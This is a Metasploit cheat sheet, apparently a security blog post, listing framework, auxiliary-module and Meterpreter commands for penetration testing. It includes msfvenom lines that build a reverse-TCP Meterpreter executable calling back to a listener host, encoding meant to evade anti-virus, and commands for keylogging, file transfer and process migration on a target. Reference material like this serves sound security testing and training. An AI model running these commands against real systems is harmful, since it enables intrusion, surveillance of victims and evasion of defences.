Homecheat sheetMetasploit cheat sheet

Metasploit cheat sheet

Metasploit full command list

Metasploit cheat sheet – Metasploit is an excellent pen-testing tool. We can use this in various transactions. We have discussed this before in numerous Metasploit hacking-related posts.

In this post, we will also look at the shutdown type command in Metasploit.

Metasploit cheat sheet

Networking commands

ipconfig:  Show network interface configuration

portfwd:  Forward packets

route:  View/edit network routing table

Process handling commands

getpid:  Display the process ID

getuid:  Display the user ID

ps:  Display running process

Kill:  Stop and terminate a process

getprivs:  Shows multiple privileges as possible

reg:  Access target machine registry

Shell:  Access target machine shell

execute:  Run a specified

migrate:  Move to a given destination process ID

Interface / output commands

enumdesktops –  Show all available desktops

Getdesktop –  Display current desktop

keyscan_ start – Start keylogger in the target machine

Keyscan_ stop –  Stop keylogger in the target machine

set _desktop –  Configure desktop

keyscan_dump –  Dump keylogger content

Metasploit cheat sheet

Search for module:  search [regex]

Specify and exploit to use:  use exploit/[ExploitPath]

Specify a Payload to use:  set PAYLOAD [PayloadPath]

Show options for the current modules:  show options

Set options:  set [Option] [Value]

Start exploit:  exploit

Useful Auxiliary Modules

				
					#Port Scanner:

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

#DNS Enumeration:

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

#FTP Server:

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

#Proxy Server:

msf > use auxiliary/server/socks4
msf > run
				
			

msfvenom commands

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.

				
					msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
				
			

Example :

Reverse Meterpreter payload as an executable and redirected into a file:

				
					$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
				
			

Format Options (specified with –f) –help-formats – List available output formats

exe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C code

Encoding Payloads with msfvenom

The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.

				
					$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeInterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
				
			

Example:

Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:

				
					$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
				
			

Meterpreter commands

? / help:  Display a summary of commands exit / quit: Exit the Meterpreter session

sysinfo:  Show the system name and OS type

shutdown / reboot:  Self-explanatory

cd:  Change directory

lcd:  Change directory on local (attacker’s) machine

pwd / getwd:  Display current working directory

ls:  Show the contents of the directory

cat:  Display the contents of a file on screen

download / upload:  Move files to/from the target machine

mkdir / rmdir:  Make / remove directory

edit:  Open a file in the default editor (typically vi)

getpid:  Display the process ID that Meterpreter is running inside.

getuid:  Display the user ID that Meterpreter is running with.

ps:  Display process list.

kill:  Terminate a process given its process ID.

execute:  Run a given program with the privileges of the process the Meterpreter is loaded in.

migrate:  Jump to a given destination process ID

Managing sessions

Run the exploit expecting a single session that is immediately backgrounded:

msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

msf > exploit –j

List all current jobs (usually exploit listeners):

msf > jobs –l

Kill a job:

msf > jobs –k [JobID]

That’s it. I hope this post was helpful to you. If you have any doubts you can ask me through the command section.

RELATED ARTICLES

Leave A Reply

Please enter your comment!
Please enter your name here

- Advertisment -

Most Popular